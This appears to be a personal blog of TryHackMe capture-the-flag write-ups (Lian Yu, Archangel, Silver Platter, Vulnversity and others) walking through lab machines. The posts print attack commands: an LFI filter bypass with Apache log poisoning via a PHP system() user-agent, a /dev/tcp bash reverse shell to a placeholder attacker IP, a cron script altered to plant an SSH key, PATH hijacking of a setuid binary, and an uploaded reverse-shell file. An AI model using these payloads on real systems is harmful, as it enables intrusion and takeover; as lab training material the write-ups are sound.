Portfólio

Resume

Thu, 07 Jun 10007 00:00:00 GMT

This site will be primarily used for small-scale cybersecurity and CTF posts. More detailed and extensive posts or projects can be found in my Github repositories or at [LINK]

This is the current layout of the items(Order by Date):

.
├── TryHackMe/
│   └── CTF_THM/
│       ├── CTF - easy/
│       │   └── posts
│       ├── CTF - medium
│       └── CTF - hard
└── ETC/
    └── posts

Lian Yu

Thu, 27 Nov 2025 00:00:00 GMT

THM

1. Discovery Ports, Services and Directory

Nmap

nmap -sC -sV -vv <IP Target> ![[Pasted image 20251203125804.png]] Ports

21 - TCP/FTP(vsftpd3.0.2)
22 - TCP/SSH(OpenSSH 6.7p1)
80 - TCP/HTTP(Apache)
111/TCP - rpcbind

Dirsearch

{TargetIP}

python3 dirsearch.py -u 10.82.138.36 -w ../wordlist/DirBuster-2007_directory-list-2.3-medium.txt

{TargetIP}/island

python3 dirsearch.py -u 10.82.138.36/island/ -w ../wordlist/DirBuster-2007_directory-list-2.3-medium.txt

HTML source code {TargetIP}/island/

What is vigilante?

HTML source code {TargetIP}/island/2100

{TargetIP}/island/2100

GoBuster

gobuster dir -u 10.82.138.36/island/2100/ -w /home/dcroce/Documentos/ComofazerUbuntu/FerramentasSec/wordlist/DirBuster-2007_directory-list-2.3-medium.txt -x ticket -t 12

{TargetIP}/island/2100/green_arrow.ticket

2. Hashes & Post-Exploitation

CyberChef

From base58

 RTy8yhBQdscX -> !#th3h00d

FTP

$ sudo ftp {targetIP} - user: vigilante - password: !#th3h00d

ftp> ls -la  
229 Entering Extended Passive Mode (|||18166|).  
150 Here comes the directory listing.  
drwxr-xr-x    2 1001     1001         4096 May 05  2020 .  
drwxr-xr-x    4 0        0            4096 May 01  2020 ..  
-rw-------    1 1001     1001           44 May 01  2020 .bash_history  
-rw-r--r--    1 1001     1001          220 May 01  2020 .bash_logout  
-rw-r--r--    1 1001     1001         3515 May 01  2020 .bashrc  
-rw-r--r--    1 0        0            2483 May 01  2020 .other_user  
-rw-r--r--    1 1001     1001          675 May 01  2020 .profile  
-rw-r--r--    1 0        0          511720 May 01  2020 Leave_me_alone.png  
-rw-r--r--    1 0        0          549924 May 05  2020 "Queen's_Gambit.png"  
-rw-r--r--    1 0        0          191026 May 01  2020 aa.jpg

ftp> mget aa.jpg Leave_me_alone.png "Queen's_Gambit.png" .other_user .profile

Reading files using cat

ftp> !cat .other_user
 
Slade Wilson was 16 years old when he enlisted in the United States Army, having lied about his age. After serving a stint in Korea, he was later assigned to Camp Washington where he ha  
d been promoted to the rank of major. In the early 1960s, he met Captain Adeline Kane, who was tasked with training young soldiers in new fighting techniques in anticipation of brewing  
troubles taking place in Vietnam. Kane was amazed at how skilled Slade was and how quickly he adapted to modern conventions of warfare. She immediately fell in love with him and realize  
d that he was without a doubt the most able-bodied combatant that she had ever encountered. She offered to privately train Slade in guerrilla warfare. In less than a year, Slade mastere  
d every fighting form presented to him and was soon promoted to the rank of lieutenant colonel. Six months later, Adeline and he were married and she became pregnant with their first ch  
ild. The war in Vietnam began to escalate and Slade was shipped overseas. In the war, his unit massacred a village, an event which sickened him. He was also rescued by SAS member Winter  
green, to whom he would later return the favor.  
  
Chosen for a secret experiment, the Army imbued him with enhanced physical powers in an attempt to create metahuman super-soldiers for the U.S. military. Deathstroke became a mercenary  
soon after the experiment when he defied orders and rescued his friend Wintergreen, who had been sent on a suicide mission by a commanding officer with a grudge.[7] However, Slade kept  
this career secret from his family, even though his wife was an expert military combat instructor.  
  
A criminal named the Jackal took his younger son Joseph Wilson hostage to force Slade to divulge the name of a client who had hired him as an assassin. Slade refused, claiming it was ag  
ainst his personal honor code. He attacked and killed the kidnappers at the rendezvous. Unfortunately, Joseph's throat was slashed by one of the criminals before Slade could prevent it,  
destroying Joseph's vocal cords and rendering him mute.  
  
After taking Joseph to the hospital, Adeline was enraged at his endangerment of her son and tried to kill Slade by shooting him, but only managed to destroy his right eye. Afterwards, h  
is confidence in his physical abilities was such that he made no secret of his impaired vision, marked by his mask which has a black, featureless half covering his lost right eye. Witho  
ut his mask, Slade wears an eyepatch to cover his eye.

Names

Slade, Wilson
Adeline, Kane
Joseph, Wilson
Wintergree
Jackal

StegSeek

$ stegseek -sf aa.jpg -wl pathwordlist/rockyou.txt

StegSeek 0.6 - https://github.com/RickdeJager/StegSeek  
[i] Found passphrase: "password"
[i] Original filename: "ss.zip".
[i] Extracting to "aa.jpg.out".

$ file aa.jpg.out 
aa.jpg.out: Zip archive data, at least v2.0 to extract, compression method=deflate
$ unzip -P password aa.jpg.out
Archive:  aa.jpg.out  
 inflating: passwd.txt                 
 inflating: shado

$ cat shado    
M3tahuman

What do i have now?

Perhaps some unexplored directory, an untested SSH port, and some names and a word(M3tahuman).

SSH

Using names

$ ssh slade@{TargetIP}
password:M3tahuman

slade@LianYu:~$ ls  
user.txt  
slade@LianYu:~$ cat user.txt    
THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}  
                       --Felicity Smoak

slade@LianYu:~$ sudo /usr/bin/pkexec /bin/bash  
root@LianYu:~#
root@LianYu:~# ls
root.txt
root@LianYu:~# cat root.txt

Archangel

Thu, 21 Aug 2025 00:00:00 GMT

THM

archangel.thm

Notes from the page

Nmap

`nmap -sC -sV -vv {TARGET_IP}`

#result
Scanned at 2025-12-15 13:59:36 -03 for 23s
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9f1d2c9d6ca40e4640506fedcf1cf38c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPrwb4vLZ/CJqefgxZMUh3zsubjXMLrKYpP8Oy5jNSRaZynNICWMQNfcuLZ2GZbR84iEQJrNqCFcbsgD+4OPyy0TXV1biJExck3OlriDBn3g9trxh6qcHTBKoUMM3CnEJtuaZ1ZPmmebbRGyrG03jzIow+w2updsJ3C0nkUxdSQ7FaNxwYOZ5S3X5XdLw2RXu/o130fs6qmFYYTm2qii6Ilf5EkyffeYRc8SbPpZKoEpT7TQ08VYEICier9ND408kGERHinsVtBDkaCec3XmWXkFsOJUdW4BYVhrD3M8JBvL1kPmReOnx8Q7JX2JpGDenXNOjEBS3BIX2vjj17Qo3V
|   256 637327c76104256a08707a36b2f2840d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKhhd/akQ2OLPa2ogtMy7V/GEqDyDz8IZZQ+266QEHke6vdC9papydu1wlbdtMVdOPx1S6zxA4CzyrcIwDQSiCg=
|   256 b64ed29c3785d67653e8c4e0481cae6c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBE3FV9PrmRlGbT2XSUjGvDjlWoA/7nPoHjcCXLer12O
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wavefire
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

GoBuster

(Using wordlist DirBuster-2007_directory-list-2.3-medium.txt)

I couldn't find anything that would lead me to the next step, so I tried to look at the "support" email, and why does it have a .thm?

vim /etc/hosts

mafialive.thm

Notes from page

GoBuster

(Using wordlist common.txt)

gobuster dir -u http://mafialive.thm -w <pathToWordlist>![[Pasted image 20251215152957.png]]

mafialive.thm/robots.txt

curl -s http://mafialive.thm/robots.txt

User-agent: *
Disallow: /test.php

http://mafialive.thm/test.php

Hmmm, this part code is interesting:

"?view/var/www/html/development_testing/mrrobot.php"

curl -s http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

/var/www/html/development_testing/test.php

<!DOCTYPE HTML>  
<html>  
  
<head>  
   <title>INCLUDE</title>  
   <h1>Test Page. Not to be Deployed</h1>  
   
   </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button>
</a><br>
       CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3  
llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48  
YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQ  
oKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0g  
ZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIG  
NvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldydd  
OwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2  
R5PgoKPC9odG1sPgoKCg==    </div>  
</body>  
  
</html>

echo "CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg==" | base64 -d

Code:

<!DOCTYPE HTML>  
<html>  
  
<head>  
   <title>INCLUDE</title>  
   <h1>Test Page. Not to be Deployed</h1>  
   
   </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>  
       <?php  
  
           //FLAG: thm{explo1t1ng_lf1}  
  
           function containsStr($str, $substr) {  
               return strpos($str, $substr) !== false;  
           }  
           if(isset($_GET["view"])){  
           if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {  
               include $_GET['view'];  
           }else{  
  
               echo 'Sorry, Thats not allowed';  
           }  
       }  
       ?>  
   </div>  
</body>  
</html>

This code has an anti-LFI mechanism, but there is a way to bypass it.

# Using
/.././.././../log/apache2/access.log
# instead of
/../../../log/apache2/access.log

/var/www/html/development_testing/.././.././../log/apache2/access.log

<!DOCTYPE HTML>  
<html>  
  
<head>  
   <title>INCLUDE</title>  
   <h1>Test Page. Not to be Deployed</h1>  
   
   </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>  
          
192.168.166.197 - - [30/Dec/2025:01:30:36 +0530] "GET /test.php HTTP/1.1" 200 473 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0"  
192.168.166.197 - - [30/Dec/2025:01:30:47 +0530] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log HTTP/1.1" 200 618 "-" "curl/7.88.1"  
192.168.166.197 - - [30/Dec/2025:01:31:08 +0530] "GET /test.php?view=/var/www/html/development_testing/../../../log/apache2/access.log HTTP/1.1" 200 482 "-" "curl/7.88.1"  
192.168.166.197 - - [30/Dec/2025:01:36:02 +0530] "GET /test.php?view=/var/www/html/development_testing/../../../log/apache2/access.log HTTP/1.1" 200 482 "-" "curl/7.88.1"  
   </div>  
</body>  
</html>

poising cache

curl -A "<?php system($_GET['cmd']); ?>" http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log

192.168.166.197 - - [30/Dec/2025:01:39:59 +0530] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log HTTP/1.1" 200 1312 "uid=33(www-data) gid=3  
3(www-data) groups=33(www-data)  
" "curl/7.88.1"  
   </div>  
</body>  
  
</html>

RCE

Now, using: Terminal 1

nc -nlvp 4444

Go in url http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/<YOURIP>/<LISTEN.PORT(4444)>%200%3E%261%22%20%26

And if everything worked as expected, this is how your Terminal 1 should look now

www-data@ubuntu:/home$ cat archangel/user.txt  
cat archangel/user.txt  
thm{lf1_t0_rc3_1s_tr1cky}

www-data@ubuntu:/etc/cron.weekly$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   archangel /opt/helloworld.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Modifying helloworld.sh to add SSH keys to authorized_keys:

cat > helloworld.sh << 'EOF'  
#!/bin/bash  
mkdir -p /home/archangel/.ssh  
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCkCn42NOCaZymJdu14cQQ3a0QIGeBmOzBSl/eV/XnTYy/xGSO1TQnjqrEYeMP5TufrrhPzfJMXQTby+ijQzR1ep8hhlHM679dfytSSfR0jEbImAKkcVu5a3Zmkc9OxQedOTBb+ErxnyX/bgTY5/dhNxAHXQGa4r2Xrp1R9  
2h1pfBq3iDzvPcT0+P29H2flBipRSv7rGNpZ0537na9Wd2ZN1jgE8cH2TUht/3wzNpGOCJCyvpbtmujemMleZJIPZ7wWVSJ7/+sliOR1b0e//sfVg7VhwCfds9STW8LMJyJqgG/N0ELk7yIGlYyQaS4eU68GTk7oxvklXWwxRhXTt4fNQky5bQ34HyzZgyQ+UYj5lZWPuoZecLm+ab  
Pv/ge//J8nKbf3oru8gY3AwYsy/Q9ZV67bJJoG6XyNFH3qycChmPKKacfLo10+xk0lkbfQd7GMIzM/1Yxvlokf+qrS/YspYkt/F7Q9w1T2+/ae1lGwE3NQ7zSvWZy6OjujjBjQeWxJb3ar/CufxYBP9d/oh4ZAOBoJv2Ieh88FtAlUb7wg9lIp7xG1+7t7/kZoEboAj9nSJqHFRTOC  
UmZ0hGOZUNuhp4oUnHHCVyAwrvEvXdGADUskuXvzuU3j65AIqiLhwOER8QIcH3LGsehPJ38Ho6/NH6hCLx/fT6t3szUZRy2cLQ== user@user.com" >> /home/archangel/.ssh/authorized_keys  
EOF

ssh -i ~/.ssh/id_rsa archangel@mafialive.thm

cd /home/archangel/secret

$ file backup  
backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter  
/lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9093af828f30f957efce9020adc16dc214371d45, for GNU/Linux 3.2.  
0, not stripped

cat > cp << EOF
#!/bin/bash
/bin/bash -i
EOF

chmod +x cp
export PATH=/home/archangel/secret:$PATH

Light

Wed, 02 Jul 2025 00:00:00 GMT

THM

Using NMAP

Port 22 (SSH) open among the first 1000 scanned ports

Using SQL Injection

When we enter a username, a “password” is returned. This suggests that the system is likely using a query such as:

SELECT * FROM usuario WHERE username = 'smokey'

This makes it possible to use UNION-based SQL injection, allowing us to query a default database table from SQLite that stores database metadata.

Now that we have the table name, let’s test it

How many records does this table contain? (2)

Now attempting to read the discovered records

Since there are two records, we can apply the following approach:

With the usernames obtained, we can now retrieve the passwords

TryHackMeAdmin – Password

flag – Password

Silver Platter

Tue, 01 Jul 2025 00:00:00 GMT

THM

1. NMAP

2. GoBuster

I then ran Gobuster on port 8080.

Results

/website/

/noredirect.html

3. Reasoning with what we have

It is understood that we have two web ports open (80/8080). On port 80, we have the website:

Now, on:

“If you want to contact us, please look for our project manager on Silverpeas. His username is scr1ptkiddy.”

What is Silverpeas?

Silverpeas is an open-source collaboration and content management platform (ECM – Enterprise Content Management), mainly aimed at corporate or institutional environments. The system provides a modular set of features that facilitate communication, document sharing, and internal process management within an organization.

So this is an organizational software We found:

Technology updated until 2022?

Searching for exploits

LINK
LINK

Exploit Bypass

Removing the highlighted part and logging in

Access granted:

CVE

Now with administrator access, I searched for exploits that could be used with proper privileges.

Rhino Security

https://rhinosecuritylabs.com/research/silverpeas-file-read-cves/ - LINK

Instructions

Usage

Privilege Escalation (tim → tyler)

Identifying the current user

Which users exist on the system?

cat /var/log/auth* | grep -i pass
1. cat /var/log/auth*
  - cat: Command used to display the contents of files.
  - /var/log/auth*: Path to authentication log files:
    - The asterisk (*) is a wildcard that includes all files starting with auth in /var/log/ (e.g., auth.log, auth.log.1, auth.log.2.gz, etc.).
    - These logs record authentication-related events (logins, sudo, SSH, etc.).
2. | (pipe)
  - Redirects the output of the previous command (cat) to the next command (grep).
3. grep -i pass
  - grep: Tool used to search for patterns in text.
  - -i: Case-insensitive mode (ignores uppercase/lowercase).
  - pass: Search term (can match “pass”, “Pass”, “PASSWORD”, etc.).
Command output

Let’s test this password: su tyler

Success!

Privilege Escalation (tyler → root)

Understanding the user
The user has sudo privileges
- sudo su
Now searching for the flags (I always recommend checking the user’s home directory) *

Vulnversity

Tue, 04 Feb 2025 00:00:00 GMT

THM

1. Scanning for open ports with NMAP

2. Enumerating directories on port 3333 with GoBuster

3. Using BurpSuite

The first step was to access the page that accepts file uploads.
Now that I know where the page accepts files, I performed a test using Burp.
First, I captured an example request in the Proxy tab (just try to upload a file and capture the request):
Then I used the Sniper attack, modifying only a specific part of this request:
By adding the symbols, the loaded payloads will be injected at that position.
Now we analyze the response:
2. From this, we know which file types are accepted by the input.

4. Now that I know which file types the input accepts, I used a .phtml file to gain access to the machine

(File from: Github) and upload it to the server to obtain a reverse shell. Some changes are required in the file:

Since we are on the TryHackMe VPN, we set the corresponding IP address.
With the file uploaded to the server, I found the directory where uploaded files are stored and accessed the malicious file.
After that, we establish the connection as shown below:

5. To retrieve the flag, I entered /home/bill and found a file containing a code.

6. Privilege escalation in this case

Searching inside the root directory:
We will use a bash reverse shell:
1. We create a file to escalate privileges (root.service).
2. Then we use wget from inside the target machine, pointing to a simple HTTP server.
  1. Server:
  2. Downloading the malicious file (root.service).
    We must be in a directory where we have write permission (/tmp).
  3. Using wget to download the malicious file from the server:
3. Enabling this file with systemctl:
4. Starting the service:

7. Connecting with the reverse shell file

(You must be listening for the connection while starting root.service)

8. Finally, we capture the last flag

Basic Pentesting

Wed, 29 Jan 2025 00:00:00 GMT

THM

Basic Pentesting

Para achar os recursos expostos da maquina:NMAP
Achar os diretórios: GoBuster
Encontramos isso:
Utilizando: enum4linux
Utilizando o hydra para fazer o forcebrute: Hydra
Resultado:
Usando SSH vamos logar na maquina:
Para copiar o arquivo do PEASS-ng:
scp <caminho do arquivo que você deseja enviar>(Downloads/...) <login para ssh>(jan@TARGET_IP)
Executando 1.
Conseguimos a senha rsa do usuário kay, utilizando para fazer login usando JohnTheRipper
Criei um arquivo com a senha:
Porém o arquivo possui uma senha:
Então vamos usar o JohnTheRipper:
1. Aqui utilizamos os ssh2john.py
Agora fazemos o login o usuário kay 1. a passphrase = beeswax